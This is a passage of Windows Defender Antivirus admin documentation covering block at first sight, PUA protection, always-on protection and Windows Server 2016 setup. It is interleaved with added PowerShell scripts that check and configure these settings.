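# 2. Reachability of the non-wildcard hosts from the table. Ports are assumptions:
#    443 for the data endpoints and symbol store, 80 for the CRL URLs (plain http).
$targets = @(
    @{ Host = 'vortex-win.data.microsoft.com';   Port = 443 }
    @{ Host = 'settings-win.data.microsoft.com'; Port = 443 }
    @{ Host = 'msdl.microsoft.com';              Port = 443 }
    @{ Host = 'crl.microsoft.com';               Port = 80 }
    @{ Host = 'www.microsoft.com';               Port = 80 }
)
$unreachable = @()
foreach ($t in $targets) {
    $tnc = Test-NetConnection -ComputerName $t.Host -Port $t.Port -WarningAction SilentlyContinue
    if ($tnc.TcpTestSucceeded) {
        "[OK]   {0}:{1}" -f $t.Host, $t.Port
    } else {
        "[FAIL] {0}:{1}" -f $t.Host, $t.Port
        $unreachable += $t.Host
    }
}
if ($unreachable) {
    Write-Warning "Blocked or unresolvable (check firewall and filtering rules): $($unreachable -join ', ')"
}

# 3. After downloading the test file (http://aka.ms/ioavtest), the Windows Defender
#    operational log should contain event ID 2050.
$evt = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id      = 2050
} -MaxEvents 3 -ErrorAction SilentlyContinue
if ($evt) {
    $evt | Select-Object TimeCreated, Id, Message | Format-List
} else {
    "No event ID 2050 found yet; download the test file first, then run this check again."
}
```

Test-NetConnection opens a direct socket and ignores proxy settings, so a [FAIL] on a proxied network does not by itself mean the endpoint is blocked; that is the case the IMPORTANT note above describes, where the proxy and filtering configuration has to be checked by hand.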

Related topics
Windows Defender Antivirus in Windows 10
Enable cloud-delivered protection
Run a Windows Defender Antivirus scan from the command line and Command line arguments
Important changes to Microsoft Active Protection Services endpoint
Enable block at first sight
5/1/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Block at first sight is a feature of next gen protection that provides a way to detect and block new malware within
seconds.
It is enabled by default when certain pre-requisite settings are also enabled. In most cases, these pre-requisite
settings are also enabled by default, so the feature is running without any intervention.
You can specify how long the file should be prevented from running while the cloud-based protection service
analyzes the file.
You can also customize the message displayed on users' desktops when a file is blocked. You can change the
company name, contact information, and message URL.

TIP
You can also visit the Windows Defender ATP demo website at demo.wd.microsoft.com to confirm the features are working
and see how they work.

How it works
When Windows Defender Antivirus encounters a suspicious but undetected file, it queries our cloud protection
backend. The cloud backend applies heuristics, machine learning, and automated analysis of the file to determine
whether the files are malicious or clean.
In Windows 10, version 1803, block at first sight can now block non-portable executable files (such as JS, VBS,
or macros) as well as executable files.
Block at first sight only uses the cloud protection backend for executable files and non-portable executable files
that are downloaded from the Internet, or that originate from the Internet zone. A hash value of the .exe file is
checked via the cloud backend to determine if this is a previously undetected file.
If the cloud backend is unable to make a determination, Windows Defender Antivirus locks the file and uploads a
copy to the cloud. The cloud performs additional analysis to reach a determination before it either allows the file
to run or blocks it in all future encounters, depending on whether it determines the file to be malicious or safe.
In many cases, this process can reduce the response time for new malware from hours to seconds.

Confirm and validate that block at first sight is enabled


Block at first sight requires a number of settings to be configured correctly or it will not work. These settings are
enabled by default in most enterprise Windows Defender Antivirus deployments.
Confirm block at first sight is enabled with Intune
1. In Intune, navigate to Device configuration - Profiles > Profile name > Device restrictions > Windows
Defender Antivirus.
NOTE
The profile you select must be a Device Restriction profile type, not an Endpoint Protection profile type.

2. Verify these settings are configured as follows:


Cloud-delivered protection: Enable
File Blocking Level: High
Time extension for file scanning by the cloud: 50
Prompt users before sample submission: Send all data without prompting

For more information about configuring Windows Defender Antivirus device restrictions in Intune, see
Configure device restriction settings in Microsoft Intune.
For a list of Windows Defender Antivirus device restrictions in Intune, see Device restriction for Windows 10
(and newer) settings in Intune.
Enable block at first sight with SCCM
1. In System Center Configuration Manager, click Assets and Compliance > Endpoint Protection >
AntiMalware Policies.
2. Click Home > Create Antimalware Policy.
3. Enter a name and a description, and add these settings:
Real time protection
Advanced
Cloud Protection Service
4. In the left column, click Real time protection, set Enable real-time protection to Yes, and set Scan
system files to Scan incoming and outgoing files.
5. Click Advanced, set Enable real-time protection to Yes, and set Scan system files to Scan incoming
and outgoing files.
6. Click Cloud Protection Service, set Cloud Protection Service membership type to Advanced
membership, set Level for blocking malicious files to High, and set Allow extended cloud check to
block and scan suspicious files for up to (seconds) to 50 seconds.
7. Click OK to create the policy.
Confirm block at first sight is enabled with Group Policy
1. On your Group Policy management computer, open the Group Policy Management Console, right-click
the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > MAPS and configure
the following Group Policies:
a. Double-click Join Microsoft MAPS and ensure the option is set to Enabled. Click OK.
b. Double-click Send file samples when further analysis is required and ensure the option is set
to Enabled and the additional options are either of the following:
Send safe samples (1)
Send all samples (3)

WARNING
Setting to 0 (Always Prompt) will lower the protection state of the device. Setting to 2 (Never send)
means block at first sight will not function.

c. Click OK.
4. In the Group Policy Management Editor, expand the tree to Windows components > Windows
Defender Antivirus > Real-time Protection:
a. Double-click Scan all downloaded files and attachments and ensure the option is set to
Enabled. Click OK.
b. Double-click Turn off real-time protection and ensure the option is set to Disabled. Click OK.
If you had to change any of the settings, you should re-deploy the Group Policy Object across your network to
ensure all endpoints are covered.
Confirm block at first sight is enabled with the Windows Security app
You can confirm that block at first sight is enabled in Windows Settings.
Block at first sight is automatically enabled as long as Cloud-based protection and Automatic sample
submission are both turned on.
Confirm Block at First Sight is enabled on individual clients
1. Open the Windows Security app by clicking the shield icon in the task bar.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then click Virus &
threat protection settings:
3. Confirm that Cloud-based Protection and Automatic sample submission are switched to On.

NOTE
If the pre-requisite settings are configured and deployed using Group Policy, the settings described in this section will be
greyed-out and unavailable for use on individual endpoints. Changes made through a Group Policy Object must first be
deployed to individual endpoints before the setting will be updated in Windows Settings.
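The same prerequisites can be read from an endpoint's local Windows Defender Antivirus preferences rather than from the Settings app. The following PowerShell script is an added example and is not code from the Microsoft documentation; it assumes the Defender PowerShell module (Get-MpPreference) is present, which is the case on Windows 10 and Windows Server 2016 with Windows Defender Antivirus installed. The function name is an assumption. The mapping from each Group Policy or Intune setting above to the corresponding preference value is given in the comments.

```powershell
# Added example (not Microsoft documentation code): report the block at first
# sight prerequisites listed on this page from the local Defender AV preferences.
# Assumes the Defender PowerShell module is available (Windows 10 / Server 2016).

function Test-BlockAtFirstSightPrereqs {
    [CmdletBinding()]
    param()

    $pref = Get-MpPreference

    # One row per prerequisite: the policy name from the page, the preference
    # value it maps to, what the page expects, and whether the endpoint matches.
    $checks = @(
        [pscustomobject]@{
            Setting  = 'Join Microsoft MAPS (MAPSReporting)'
            Value    = $pref.MAPSReporting
            Expected = '1 (Basic) or 2 (Advanced); the SCCM steps above set Advanced'
            Ok       = ($pref.MAPSReporting -ne 0)
        }
        [pscustomobject]@{
            Setting  = 'Send file samples when further analysis is required (SubmitSamplesConsent)'
            Value    = $pref.SubmitSamplesConsent
            Expected = '1 (Send safe samples) or 3 (Send all samples)'
            Ok       = ($pref.SubmitSamplesConsent -in @(1, 3))
        }
        [pscustomobject]@{
            Setting  = "Configure the 'Block at First Sight' feature (DisableBlockAtFirstSeen)"
            Value    = $pref.DisableBlockAtFirstSeen
            Expected = 'False (feature not disabled)'
            Ok       = (-not $pref.DisableBlockAtFirstSeen)
        }
        [pscustomobject]@{
            Setting  = 'Turn off real-time protection (DisableRealtimeMonitoring)'
            Value    = $pref.DisableRealtimeMonitoring
            Expected = 'False (real-time protection on)'
            Ok       = (-not $pref.DisableRealtimeMonitoring)
        }
        [pscustomobject]@{
            Setting  = 'Scan all downloaded files and attachments (DisableIOAVProtection)'
            Value    = $pref.DisableIOAVProtection
            Expected = 'False (download scanning on)'
            Ok       = (-not $pref.DisableIOAVProtection)
        }
        [pscustomobject]@{
            Setting  = 'File Blocking Level (CloudBlockLevel)'
            Value    = $pref.CloudBlockLevel
            Expected = '2 (High), as the Intune and SCCM steps set it'
            Ok       = ($pref.CloudBlockLevel -ge 2)
        }
        [pscustomobject]@{
            Setting  = 'Time extension for file scanning by the cloud (CloudExtendedTimeout)'
            Value    = $pref.CloudExtendedTimeout
            # Informational only: the page recommends 50 s on top of the default 10 s
            # block; block at first sight still works with any value here.
            Expected = "50 recommended (effective block time = 10 + $($pref.CloudExtendedTimeout) s)"
            Ok       = $true
        }
    )
    return $checks
}

$result = Test-BlockAtFirstSightPrereqs
$result | Format-Table Setting, Value, Expected, Ok -AutoSize

$failed = @($result | Where-Object { -not $_.Ok })
if ($failed.Count -eq 0) {
    Write-Host 'All block at first sight prerequisites are met on this endpoint.'
} else {
    Write-Warning "$($failed.Count) prerequisite(s) not met; block at first sight will not function until they are corrected."
}
```

Run it in an elevated console on a representative endpoint after a Group Policy refresh; a False in the Ok column points at the exact policy in the steps above that still needs to be deployed.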

Validate block at first sight is working


You can validate that the feature is working by following the steps outlined in Validate connections between your
network and the cloud.

Disable block at first sight


WARNING
Disabling block at first sight will lower the protection state of the endpoint and your network.

You may choose to disable block at first sight if you want to retain the pre-requisite settings without using block
at first sight protection. You might wish to do this if you are experiencing latency issues or you want to test the
feature's impact on your network.
Disable block at first sight with Group Policy
1. On your Group Policy management computer, open the Group Policy Management Console, right-click
the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree through Windows components > Windows Defender Antivirus > MAPS.
4. Double-click Configure the 'Block at First Sight' feature and set the option to Disabled.

NOTE
Disabling block at first sight will not disable or alter the pre-requisite group policies.

Related topics
Windows Defender Antivirus in Windows 10
Enable cloud-delivered protection
Configure the cloud block timeout period
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
When Windows Defender Antivirus finds a suspicious file, it can prevent the file from running while it queries the
Windows Defender Antivirus cloud service.
The default period that the file will be blocked is 10 seconds. You can specify an additional period of time to wait
before the file is allowed to run. This can help ensure there is enough time to receive a proper determination from
the Windows Defender Antivirus cloud service.

Prerequisites to use the extended cloud block timeout


Block at first sight and its prerequisites must be enabled before you can specify an extended timeout period.

Specify the extended timeout period


You can use Group Policy to specify an extended timeout for cloud checks.
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > MpEngine
4. Double-click Configure extended cloud check and ensure the option is enabled. Specify the additional
amount of time to prevent the file from running while waiting for a cloud determination. You can specify
the additional time, in seconds, from 1 second to 50 seconds. This time will be added to the default 10
seconds.
5. Click OK.

Related topics
Windows Defender Antivirus in Windows 10
Use next-gen antivirus technologies through cloud-delivered protection
Configure block at first sight
Enable cloud-delivered protection
Configure behavioral, heuristic, and real-time protection
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Antivirus uses several methods to provide threat protection:
Cloud-delivered protection for near-instant detection and blocking of new and emerging threats
Always-on scanning, using file and process behavior monitoring and other heuristics (also known as "real-time
protection")
Dedicated protection updates based on machine-learning, human and automated big-data analysis, and in-
depth threat resistance research
You can configure how Windows Defender Antivirus uses these methods with Group Policy, System Center
Configuration Manager, PowerShell cmdlets, and Windows Management Instrumentation (WMI).
This section covers configuration for always-on scanning, including how to detect and block apps that are deemed
unsafe, but may not be detected as malware.
See Use next-gen Windows Defender Antivirus technologies through cloud-delivered protection for how to
enable and configure Windows Defender Antivirus cloud-delivered protection.

In this section
TOPIC | DESCRIPTION

Detect and block potentially unwanted applications | Detect and block apps that may be unwanted in your network, such as adware, browser modifiers and toolbars, and rogue or fake antivirus apps

Enable and configure Windows Defender Antivirus protection capabilities | Enable and configure real-time protection, heuristics, and other always-on Windows Defender Antivirus monitoring features
Detect and block potentially unwanted applications
4/26/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
The potentially unwanted application (PUA) protection feature in Windows Defender Antivirus can detect and
block PUAs on endpoints in your network.
These applications are not considered viruses, malware, or other types of threats, but might perform actions on
endpoints that adversely affect their performance or use. PUA can also refer to applications that are considered to
have poor reputation.
Typical PUA behavior includes:
Various types of software bundling
Ad injection into web browsers
Driver and registry optimizers that detect issues, request payment to fix the errors, but remain on the endpoint
and make no changes or optimizations (also known as "rogue antivirus" programs)
These applications can increase the risk of your network being infected with malware, cause malware infections to
be harder to identify, and can waste IT resources in cleaning up the applications.

TIP
You can also visit the Windows Defender ATP demo website at demo.wd.microsoft.com to confirm the feature is working and
see how it works.

How it works
Windows Defender Antivirus blocks detected PUA files and attempts to download, move, run, or install them.
Blocked PUA files are then moved to quarantine.
When a PUA is detected on an endpoint, Windows Defender Antivirus presents a notification to the user (unless
notifications have been disabled) in the same format as normal threat detections (prefaced with "PUA:").
They will also appear in the usual quarantine list in the Windows Security app.

View PUA events


PUA events are reported in the Windows Event Viewer, but not in System Center Configuration Manager or
Intune.
You can turn on email notifications for PUA detections.
See Troubleshoot event IDs for details on viewing Windows Defender Antivirus events. PUA events are recorded
under event ID 1160.

Configure PUA protection


You can enable PUA protection with Microsoft Intune, System Center Configuration Manager, Group Policy, or
PowerShell cmdlets.
You can also use the PUA audit mode to detect PUA without blocking them. The detections will be captured in the
Windows event log.
This feature is useful if your company is conducting an internal software security compliance check and you'd like
to avoid any false positives.
Use Intune to configure PUA protection
See Configure device restriction settings in Microsoft Intune and Windows Defender Antivirus device restriction
settings for Windows 10 in Intune for more details.
Use Configuration Manager to configure PUA protection:
PUA protection is enabled by default in System Center Configuration Manager (current branch), including version
1606 and later.
See How to create and deploy antimalware policies: Scheduled scans settings for details on configuring System
Center Configuration Manager (current branch).
For Configuration Manager 2012, see How to Deploy Potentially Unwanted Application Protection Policy for
Endpoint Protection in Configuration Manager.

NOTE
PUA events are reported in the Windows Event Viewer and not in System Center Configuration Manager.

Use Group Policy to configure PUA protection:


1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus.
4. Double-click Configure protection for potentially unwanted applications.
5. Click Enabled to enable PUA protection.
6. In Options, select Block to block potentially unwanted applications, or select Audit Mode to test how the
setting will work in your environment. Click OK.
Use PowerShell cmdlets to configure PUA protection:
Use the following cmdlet:

Set-MpPreference -PUAProtection

Setting the value for this cmdlet to Enabled will turn the feature on if it has been disabled.
Setting AuditMode will detect PUAs but will not block them.
See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
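The following PowerShell script is an added example, not code from the Microsoft documentation. It puts PUA protection into the audit mode described above, confirms the setting, and then reads the resulting PUA detections (event ID 1160, see "View PUA events") back from the Windows Defender operational event log so the audit results can be reviewed before switching to Block. It assumes an elevated console on an endpoint with the Defender PowerShell module; the function names are assumptions.

```powershell
# Added example (not Microsoft documentation code): configure PUA audit mode and
# read back the audited detections from the event log.
# Assumes an elevated console and the Defender PowerShell module.

function Set-PuaProtectionMode {
    param(
        # Disabled, Enabled (block), or AuditMode (detect and log only)
        [ValidateSet('Disabled', 'Enabled', 'AuditMode')]
        [string]$Mode
    )
    Set-MpPreference -PUAProtection $Mode
    # Read back: 0 = Disabled, 1 = Enabled, 2 = AuditMode
    return (Get-MpPreference).PUAProtection
}

function Get-PuaDetections {
    param([int]$Days = 7)

    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1160                      # PUA detected (see "View PUA events")
        StartTime = (Get-Date).AddDays(-$Days)
    }
    # Get-WinEvent raises a non-terminating error when nothing matches;
    # treat that as an empty result rather than a failure.
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        [pscustomobject]@{
            Time    = $e.TimeCreated
            # First line of the message carries the detection summary
            Summary = ($e.Message -split "`r?`n")[0]
        }
    }
}

# Example run: audit mode for an internal software compliance check, then list
# what would have been blocked over the past week.
$mode = Set-PuaProtectionMode -Mode AuditMode
Write-Host "PUAProtection is now $mode (2 = AuditMode)"
Get-PuaDetections -Days 7 | Format-Table -AutoSize
```

Once the audit list contains only software you expect to be flagged, call `Set-PuaProtectionMode -Mode Enabled` to start blocking.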

Related topics
Next gen protection
Configure behavioral, heuristic, and real-time protection
Enable and configure antivirus always-on protection and monitoring
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Always-on protection consists of real-time protection, behavior monitoring, and heuristics to identify
malware based on known suspicious and malicious activities.
These activities include events such as processes making unusual changes to existing files, modifying or
creating automatic startup registry keys and startup locations (also known as auto-start extensibility points,
or ASEPs), and other changes to the file system or file structure.

Configure and enable always-on protection


You can configure how always-on protection works with the Group Policy settings described in this section.
To configure these settings:
1. On your Group Policy management computer, open the Group Policy Management Console, right-
click the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click
Administrative templates.
3. Expand the tree to Windows components > Windows Defender Antivirus and then the Location
specified in the table below.
4. Double-click the policy Setting as specified in the table below, and set the option to your desired
configuration. Click OK and repeat for any other settings.

Location: Real-time protection
Setting: Monitor file and program activity on your computer
Description: The Windows Defender Antivirus engine makes note of any file changes (file writes, such as moves, copies, or modifications) and general program activity (programs that are opened or running and that cause other programs to run)
Default setting (if not configured): Enabled

Location: Real-time protection
Setting: Scan all downloaded files and attachments
Description: Downloaded files and attachments are automatically scanned. This operates in addition to the SmartScreen filter, which scans files before and during downloading
Default setting (if not configured): Enabled

Location: Real-time protection
Setting: Turn on process scanning whenever real-time protection is enabled
Description: You can independently enable the Windows Defender Antivirus engine to scan running processes for suspicious modifications or behaviors. This is useful if you have temporarily disabled real-time protection and want to automatically scan processes that started while it was disabled
Default setting (if not configured): Enabled

Location: Real-time protection
Setting: Turn on behavior monitoring
Description: The AV engine will monitor file processes, file and registry changes, and other events on your endpoints for suspicious and known malicious activity
Default setting (if not configured): Enabled

Location: Real-time protection
Setting: Turn on raw volume write notifications
Description: Information about raw volume writes will be analyzed by behavior monitoring
Default setting (if not configured): Enabled

Location: Real-time protection
Setting: Define the maximum size of downloaded files and attachments to be scanned
Description: You can define the size in kilobytes
Default setting (if not configured): Enabled

Location: Real-time protection
Setting: Configure monitoring for incoming and outgoing file and program activity
Description: Specify whether monitoring should occur on incoming, outgoing, both, or neither direction. This is relevant for Windows Server installations where you have defined specific servers or Server Roles that see large amounts of file changes in only one direction and you want to improve network performance. Note that fully updated endpoints (and servers) on a network will see little performance impact irrespective of the number or direction of file changes.
Default setting (if not configured): Enabled (both directions)

Location: Scan
Setting: Turn on heuristics
Description: Heuristic protection will disable or block suspicious activity immediately before the Windows Defender Antivirus engine is asked to detect the activity
Default setting (if not configured): Enabled

Location: Root
Setting: Allow antimalware service to startup with normal priority
Description: You can lower the priority of the Windows Defender Antivirus engine, which may be useful in lightweight deployments where you want to have as lean a startup process as possible. This may impact protection on the endpoint.
Default setting (if not configured): Enabled

Location: Root
Setting: Allow antimalware service to remain running always
Description: If protection updates have been disabled, you can set Windows Defender Antivirus to still run. This lowers the protection on the endpoint.
Default setting (if not configured): Disabled
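Several of the always-on settings in the table above also have Set-MpPreference equivalents, which is convenient for checking a server that is not yet covered by the Group Policy Object. The script below is an added example, not code from the Microsoft documentation; it reads behavior monitoring and the scan-direction setting, then applies the one-direction monitoring the table describes for a server role that sees file changes in only one direction. It assumes the Defender PowerShell module and an elevated console; the function names and the file-server scenario are assumptions.

```powershell
# Added example (not Microsoft documentation code): inspect and tune the
# always-on settings that map to Set-MpPreference parameters.
# Assumes the Defender PowerShell module and an elevated console.

function Get-AlwaysOnProtectionState {
    $p = Get-MpPreference
    [pscustomobject]@{
        # "Turn off real-time protection" (Disabled in GP = monitoring on)
        RealTimeProtection    = -not $p.DisableRealtimeMonitoring
        # "Turn on behavior monitoring"
        BehaviorMonitoring    = -not $p.DisableBehaviorMonitoring
        # "Configure monitoring for incoming and outgoing file and program activity":
        # 0 = both directions, 1 = incoming only, 2 = outgoing only
        RealTimeScanDirection = $p.RealTimeScanDirection
    }
}

function Set-ServerRoleScanDirection {
    param(
        [ValidateSet('Both', 'Incoming', 'Outgoing')]
        [string]$Direction
    )
    Set-MpPreference -RealTimeScanDirection $Direction
    # Return the value the engine now reports (0 = Both, 1 = Incoming, 2 = Outgoing)
    return (Get-MpPreference).RealTimeScanDirection
}

$before = Get-AlwaysOnProtectionState
$before | Format-List

if (-not $before.BehaviorMonitoring) {
    Write-Warning 'Behavior monitoring is off; heuristic detection of ASEP and file-system changes is reduced.'
}

# Scenario (assumed): a file server that mostly receives files, so only incoming
# writes are scanned. Revert to Both if the performance gain is not needed; the
# table notes that fully updated endpoints see little impact either way.
$dir = Set-ServerRoleScanDirection -Direction Incoming
Write-Host "RealTimeScanDirection is now $dir (1 = Incoming)"
```

Settings without a cmdlet equivalent in the table (process scanning, raw volume write notifications, heuristics, service priority) are still Group Policy only and should be verified through the Group Policy Management Editor steps above.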

Disable real-time protection


WARNING
Disabling real-time protection will drastically reduce the protection on your endpoints and is not recommended.

The main real-time protection capability is enabled by default, but you can disable it with Group Policy:
Use Group Policy to disable real-time protection:
1. On your Group Policy management computer, open the Group Policy Management Console, right-
click the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click
Administrative templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Real-time
protection.
4. Double-click the Turn off real-time protection setting and set the option to Enabled. Click OK.

Related topics
Configure behavioral, heuristic, and real-time protection
Windows Defender Antivirus in Windows 10
Windows Defender Antivirus on Windows Server 2016
4/5/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Antivirus is available on Windows Server 2016. In some instances it is referred to as Endpoint
Protection - however, the protection engine is the same.
While the functionality, configuration, and management are largely the same for Windows Defender AV on either
Windows 10 or Windows Server 2016, there are a few key differences:
In Windows Server 2016, automatic exclusions are applied based on your defined Server Role.
In Windows Server 2016, Windows Defender AV will not disable itself if you are running another antivirus
product.
This topic includes the following instructions for setting up and running Windows Defender AV on a server
platform:
Enable the interface
Verify Windows Defender AV is running
Update antimalware Security intelligence
Submit Samples
Configure automatic exclusions

Enable or disable the interface on Windows Server 2016


By default, Windows Defender AV is installed and functional on Windows Server 2016. The user interface is
installed by default on some SKUs, but is not required.

NOTE
You can't uninstall the Windows Security app, but you can disable the interface with these instructions.

If the interface is not installed, you can add it in the Add Roles and Features Wizard at the Features step, under
Windows Defender Features by selecting the GUI for Windows Defender option.
See the Install or uninstall roles, role services, or features topic for information on using the wizard.
The following PowerShell cmdlet will also enable the interface:

Install-WindowsFeature -Name Windows-Defender-GUI

To hide the interface, use the Remove Roles and Features Wizard and deselect the GUI for Windows
Defender option at the Features step, or use the following PowerShell cmdlet:

Uninstall-WindowsFeature -Name Windows-Defender-GUI

IMPORTANT
Windows Defender AV will still run normally without the user interface, but the user interface cannot be enabled if you
disable the core Windows Defender feature.

Install or uninstall Windows Defender AV on Windows Server 2016


You can also uninstall Windows Defender AV completely with the Remove Roles and Features Wizard by
deselecting the Windows Defender Features option at the Features step in the wizard.
This is useful if you have a third-party antivirus product installed on the machine already. Multiple AV products
can cause problems when installed and actively running on the same machine. See the question "Should I run
Microsoft security software at the same time as other security products?" on the Windows Defender Security
Intelligence Antivirus and antimalware software FAQ.
NOTE
Deselecting Windows Defender on its own under the Windows Defender Features section will automatically prompt you
to remove the interface option GUI for Windows Defender.

The following PowerShell cmdlet will also uninstall Windows Defender AV on Windows Server 2016:

Uninstall-WindowsFeature -Name Windows-Defender

To install Windows Defender AV again, use the Add Roles and Features Wizard and ensure the Windows
Defender feature is selected. You can also enable the interface by selecting the GUI for Windows Defender
option.
You can also use the following PowerShell cmdlet to install Windows Defender AV:

Install-WindowsFeature -Name Windows-Defender

TIP
Event messages for the antimalware engine included with Windows Defender AV can be found in Windows Defender AV
Events.

Verify Windows Defender is running


To verify that Windows Defender AV is running on the server, run the following command from a command
prompt:

sc query Windefend

The sc query command returns information about the Windows Defender service. If Windows Defender is
running, the STATE value displays RUNNING .

Update antimalware Security intelligence


In order to get updated antimalware Security intelligence, you must have the Windows Update service running. If
you use an update management service, like Windows Server Update Services (WSUS), make sure that updates
for Windows Defender Antivirus Security intelligence are approved for the computers you manage.
By default, Windows Update does not download and install updates automatically on Windows Server 2016. You
can change this configuration by using one of the following methods:
Windows Update in Control Panel.
Install updates automatically results in all updates being automatically installed, including
Windows Defender Security intelligence updates.
Download updates but let me choose whether to install them allows Windows Defender to
download and install Security intelligence updates automatically, but other updates are not
automatically installed.
Group Policy. You can set up and manage Windows Update by using the settings available in Group
Policy, in the following path: Administrative Templates\Windows Components\Windows
Update\Configure Automatic Updates
The AUOptions registry key. The following two values allow Windows Update to automatically download
and install Security intelligence updates.
4 Install updates automatically. This value results in all updates being automatically installed,
including Windows Defender Security intelligence updates.
3 Download updates but let me choose whether to install them. This value allows Windows
Defender to download and install Security intelligence updates automatically, but other updates are
not automatically installed.
To ensure that protection from malware is maintained, we recommend that you enable the following services:
Windows Error Reporting service
Windows Update service
The following table lists the services for Windows Defender and the dependent services.

SERVICE NAME | FILE LOCATION | DESCRIPTION

Windows Defender Service (Windefend) | C:\Program Files\Windows Defender\MsMpEng.exe | This is the main Windows Defender Antivirus service that needs to be running at all times.

Windows Error Reporting Service (Wersvc) | C:\WINDOWS\System32\svchost.exe -k WerSvcGroup | This service sends error reports back to Microsoft.

Windows Defender Firewall (MpsSvc) | C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork | We recommend leaving the Windows Defender Firewall service enabled.

Windows Update (Wuauserv) | C:\WINDOWS\system32\svchost.exe -k netsvcs | Windows Update is needed to get Security intelligence updates and antimalware engine updates.

Submit Samples
Sample submission allows Microsoft to collect samples of potentially malicious software. To help provide
continued and up-to-date protection, Microsoft researchers use these samples to analyze suspicious activities and
produce updated antimalware Security intelligence.
We collect program executable files, such as .exe files and .dll files. We do not collect files that contain personal
data, like Microsoft Word documents and PDF files.
Enable automatic sample submission
To enable automatic sample submission, start a Windows PowerShell console as an administrator, and set
the SubmitSamplesConsent value data according to one of the following settings:
0 Always prompt. The Windows Defender service prompts you to confirm submission of all required
files. This is the default setting for Windows Defender, but is not recommended for Windows Server
2016 installations without a GUI.
1 Send safe samples automatically. The Windows Defender service sends all files marked as "safe"
and prompts for the remainder of the files.
2 Never send. The Windows Defender service does not prompt and does not send any files.
3 Send all samples automatically. The Windows Defender service sends all files without a prompt for
confirmation.
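The three server checks above (the service table, the AUOptions value, and the SubmitSamplesConsent setting) can be done from one PowerShell session. The script below is an added example, not code from the Microsoft documentation. It assumes a Windows Server 2016 host with Windows Defender AV installed, an elevated console, and the Defender PowerShell module; the registry path used for AUOptions is the standard Windows Update policy key, which is an assumption since the page does not state where the key lives. The function names are assumptions.

```powershell
# Added example (not Microsoft documentation code): verify Defender-related
# services, the Windows Update AUOptions value, and set sample submission.
# Assumes Windows Server 2016 with Windows Defender AV and an elevated console.

function Get-DefenderServiceState {
    # Service names and purposes taken from the table above
    $wanted = [ordered]@{
        WinDefend = 'Windows Defender Service (must be running at all times)'
        WerSvc    = 'Windows Error Reporting Service'
        MpsSvc    = 'Windows Defender Firewall'
        wuauserv  = 'Windows Update (needed for Security intelligence updates)'
    }
    foreach ($name in $wanted.Keys) {
        $svc = Get-Service -Name $name -ErrorAction SilentlyContinue
        $status = if ($svc) { $svc.Status.ToString() } else { 'NotInstalled' }
        [pscustomobject]@{
            Service     = $name
            Status      = $status
            Description = $wanted[$name]
        }
    }
}

function Get-AutomaticUpdateOption {
    # Assumed location of the policy-managed AUOptions value (set by the
    # "Configure Automatic Updates" Group Policy). 4 = install updates
    # automatically, 3 = download but let me choose; both keep Security
    # intelligence updates flowing.
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU'
    $item = Get-ItemProperty -Path $policyKey -Name AUOptions -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.AUOptions
}

function Set-SampleSubmission {
    param(
        # 0 = Always prompt, 1 = Send safe samples, 2 = Never send, 3 = Send all samples
        [ValidateSet('AlwaysPrompt', 'SendSafeSamples', 'NeverSend', 'SendAllSamples')]
        [string]$Consent
    )
    Set-MpPreference -SubmitSamplesConsent $Consent
    return (Get-MpPreference).SubmitSamplesConsent
}

Get-DefenderServiceState | Format-Table -AutoSize

$au = Get-AutomaticUpdateOption
if ($au -in @(3, 4)) {
    Write-Host "AUOptions = $au; Security intelligence updates will install automatically."
} else {
    Write-Warning "AUOptions is '$au'; set it to 3 or 4 (or configure Windows Update) so Security intelligence updates are installed."
}

# A Server Core installation has no GUI to answer a prompt, so avoid AlwaysPrompt (0).
$consent = Set-SampleSubmission -Consent SendSafeSamples
Write-Host "SubmitSamplesConsent is now $consent (1 = Send safe samples)"
```

If `WinDefend` reports anything other than `Running`, the `sc query Windefend` check from the "Verify Windows Defender is running" section will show the same state; start there before changing any other setting.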

Configure automatic exclusions


To help ensure security and performance, certain exclusions are automatically added based on the roles and
features you install when using Windows Defender AV on Server 2016.
See the Configure exclusions in Windows Defender AV on Windows Server topic for more information.

Related topics
Windows Defender Antivirus in Windows 10
Configure exclusions in Windows Defender AV on Windows Server
Windows Defender Antivirus compatibility
4/5/2019 • 4 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Antivirus is automatically enabled and installed on endpoints and devices that are
running Windows 10.
However, on endpoints and devices that are protected with a non-Microsoft antivirus or antimalware app,
Windows Defender Antivirus will automatically disable itself. You can then choose to enable an optional,
